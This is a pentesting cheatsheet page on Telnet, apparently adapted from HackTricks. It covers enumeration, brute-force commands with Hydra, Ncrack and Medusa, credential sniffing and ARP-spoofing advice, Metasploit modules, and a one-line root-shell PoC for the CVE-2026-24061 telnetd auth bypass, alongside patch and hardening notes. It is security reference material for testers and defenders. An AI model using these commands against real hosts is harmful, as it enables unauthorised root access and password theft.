daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pentesting-telnet.md (10249B)


      1 ---
      2 title: "23 - Pentesting Telnet"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-telnet.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-telnet.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 23 - Pentesting Telnet
     14 
     15 ## **Basic Information**
     16 
     17 Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.
     18 
     19 **Default port:** 23
     20 
     21 ```text
     22 23/tcp open  telnet
     23 ```
     24 
     25 ## **Enumeration**
     26 
     27 ### **Banner Grabbing**
     28 
     29 ```bash
     30 nc -vn <IP> 23
     31 ```
     32 
     33 All the interesting enumeration can be performed by **nmap**:
     34 
     35 ```bash
     36 nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
     37 ```
     38 
     39 The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions).
     40 
     41 From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In the TELNET Protocol are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.
     42 
     43 **I know it is possible to enumerate this options but I don't know how, so let me know if know how.**
     44 
     45 ### **Enumerate Telnet Options / Features**
     46 
     47 Telnet uses **IAC + DO/DONT/WILL/WONT** negotiations to enable options. You can observe supported options by capturing the initial negotiation and by probing for specific features.
     48 
     49 **Nmap option/feature probes**
     50 
     51 ```bash
     52 # Detect support for the Telnet ENCRYPT option
     53 nmap -p 23 --script telnet-encryption <IP>
     54 
     55 # Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
     56 nmap -p 23 --script telnet-ntlm-info <IP>
     57 
     58 # Brute-force via NSE (alternative to Hydra/Medusa)
     59 nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>
     60 ```
     61 
     62 The `telnet-encryption` script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only checks support.
     63 `telnet-ntlm-info` discloses NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM is enabled.
     64 `telnet-brute` is an NSE brute-force auditor for Telnet.
     65 
     66 ### [Brute force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#telnet)
     67 
     68 ## Config file
     69 
     70 ```bash
     71 /etc/inetd.conf
     72 /etc/xinetd.d/telnet
     73 /etc/xinetd.d/stelnet
     74 ```
     75 
     76 ## HackTricks Automatic Commands
     77 
     78 ```text
     79 Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
     80 Port_Number:  23     #Comma separated if there is more than one.
     81 Protocol_Description: Telnet          #Protocol Abbreviation Spelled out
     82 
     83 Entry_1:
     84   Name: Notes
     85   Description: Notes for t=Telnet
     86   Note: |
     87     wireshark to hear creds being passed
     88     tcp.port == 23 and ip.addr != myip
     89 
     90     https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html
     91 
     92 Entry_2:
     93   Name: Banner Grab
     94   Description: Grab Telnet Banner
     95   Command: nc -vn {IP} 23
     96 
     97 Entry_3:
     98   Name: Nmap with scripts
     99   Description: Run nmap scripts for telnet
    100   Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}
    101 
    102 Entry_4:
    103   Name: consoleless mfs enumeration
    104   Description: Telnet enumeration without the need to run msfconsole
    105   Note: sourced from https://github.com/carlospolop/legion
    106   Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
    107 
    108 ```
    109 
    110 ### Recent Vulnerabilities (2022-2026)
    111 
    112 * **CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860)**: Improper input validation in the telnet service allows remote attackers to log in using hard-coded credentials and inject OS commands; fixed by firmware **1.04B05** or later.<sup>[[6]](#references)</sup>
    113 * **CVE-2023-40478 – NETGEAR RAX30**: Stack-based buffer overflow in the Telnet CLI `passwd` command enables network-adjacent code execution as root; authentication is required but can be bypassed.<sup>[[7]](#references)</sup>
    114 * **CVE-2022-39028 – GNU inetutils telnetd**: A two-byte sequence (`0xff 0xf7` / `0xff 0xf8`) can trigger a NULL-pointer dereference in `telnetd`, and repeated crashes can lead inetd to disable the service (DoS).<sup>[[5]](#references)</sup>
    115 
    116 Keep these CVEs in mind during vulnerability triage—if the target is running an un-patched firmware or legacy inetutils Telnet daemon you may have a straight-forward path to code-execution or a disruptive DoS.
    117 
    118 ### CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)
    119 
    120 **Primitive:** Telnet **NEW_ENVIRON** lets clients push environment variables during option negotiation; inetutils `telnetd` substitutes `%U` in its login template with `getenv("USER")` and passes it directly to `/usr/bin/login`, enabling **argv-level option injection** (no shell expansion).
    121 **Root cause:** versions **1.9.3–2.7** expand `%U` without filtering, so a `USER` value beginning with `-` is parsed as a `login` flag. For example, `%U` becomes `-f root`, yielding `/usr/bin/login -h <hostname> "-f root"` and **skipping authentication** via `login -f`.<sup>[[1]](#references)[[3]](#references)</sup>
    122 
    123 **Exploit flow:**<sup>[[1]](#references)</sup>
    124 1. Connect to the Telnet service and negotiate **NEW_ENVIRON** to set `USER=-f root`.
    125 2. `telnetd` builds the login argv including the attacker-controlled `%U` value.
    126 3. `/usr/bin/login` interprets `-f root` as "pre-authenticated user root" and spawns a root shell.
    127 
    128 **PoC**<sup>[[1]](#references)</sup>
    129 
    130 ```bash
    131 # Inject USER via NEW_ENVIRON and obtain a root shell
    132 USER='-f root' telnet -a <ip>
    133 ```
    134 
    135 **Patch note:** inetutils **2.7-2** introduces a `sanitize()` helper that rejects values starting with `-` or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection.<sup>[[1]](#references)[[2]](#references)</sup>
    136 **Detection/verification:** identify exposed daemons with `telnetd --version`, `dpkg -l | grep inetutils`, `systemctl status inetutils-telnetd`, or `netstat -tlnp | grep :23`.<sup>[[1]](#references)</sup>
    137 
    138 **Mitigations**
    139 
    140 * **Patch/upgrade** affected packages immediately (e.g., Debian fixes are in `2:2.4-2+deb12u2`, `2:2.6-3+deb13u1`, and `2:2.7-2`).<sup>[[4]](#references)</sup>
    141 * **Disable Telnet** or restrict access to trusted management networks while patching.<sup>[[8]](#references)</sup>
    142 
    143 ### Sniffing Credentials & Man-in-the-Middle
    144 
    145 Telnet transmits everything, including credentials, in **clear-text**. Two quick ways to capture them:
    146 
    147 ```bash
    148 # Live capture with tcpdump (print ASCII)
    149 sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'
    150 
    151 # Wireshark display filter
    152  tcp.port == 23 && (telnet.data || telnet.option)
    153 ```
    154 For active MITM, combine ARP spoofing (e.g. `arpspoof`/`ettercap`) with the same sniffing filters to harvest passwords on switched networks.
    155 
    156 ### Automated Brute-force / Password Spraying
    157 
    158 ```bash
    159 # Hydra (stop at first valid login)
    160 hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
    161 
    162 # Ncrack (drop to interactive session on success)
    163 ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
    164 
    165 # Medusa (parallel hosts)
    166 medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
    167 ```
    168 Most IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries—mirroring that logic can quickly identify weak devices.
    169 
    170 ### Exploitation & Post-Exploitation
    171 
    172 Metasploit has several useful modules:
    173 
    174 * `auxiliary/scanner/telnet/telnet_version` – banner & option enumeration.
    175 * `auxiliary/scanner/telnet/brute_telnet` – multithreaded bruteforce.
    176 * `auxiliary/scanner/telnet/telnet_encrypt_overflow` – RCE against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling).
    177 * `exploit/linux/mips/netgear_telnetenable` – enables telnet service with a crafted packet on many NETGEAR routers.
    178 
    179 After a shell is obtained remember that **TTYs are usually dumb**; upgrade with `python -c 'import pty;pty.spawn("/bin/bash")'` or use the [HackTricks TTY tricks](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src//generic-hacking/reverse-shells/full-ttys.md).
    180 
    181 ### Hardening & Detection (Blue team corner)
    182 
    183 1. Prefer SSH and disable Telnet service completely.  
    184 2. If Telnet is required, bind it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (`/etc/hosts.allow`).  
    185 3. Replace legacy `telnetd` implementations with `ssl-telnet` or `telnetd-ssl` to add transport encryption, but **this only protects data-in-transit—password-guessing remains trivial**.  
    186 4. Monitor for outbound traffic to port 23; compromises often spawn reverse shells over Telnet to bypass strict-HTTP egress filters.
    187 
    188 ## References
    189 
    190 - [1] [OffSec – CVE-2026-24061 – GNU InetUtils telnetd Authentication Bypass Vulnerability](https://www.offsec.com/blog/cve-2026-24061/)
    191 - [2] [Inetutils sanitize() fix (ccba9f748aa8d50a38d7748e2e60362edd6a32cc)](https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc)
    192 - [3] [NVD – CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
    193 - [4] [Debian Security Tracker – CVE-2026-24061](https://security-tracker.debian.org/tracker/CVE-2026-24061)
    194 - [5] [NVD – CVE-2022-39028 inetutils `telnetd` DoS](https://nvd.nist.gov/vuln/detail/CVE-2022-39028)
    195 - [6] [NVD – CVE-2024-45698 D-Link DIR-X4860 Telnet RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-45698)
    196 - [7] [NVD – CVE-2023-40478 NETGEAR RAX30 Telnet Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2023-40478)
    197 - [8] [Canadian Centre for Cyber Security Alert AL26-002 (CVE-2026-24061)](https://www.cyber.gc.ca/en/alerts-advisories/alert-AL26-002)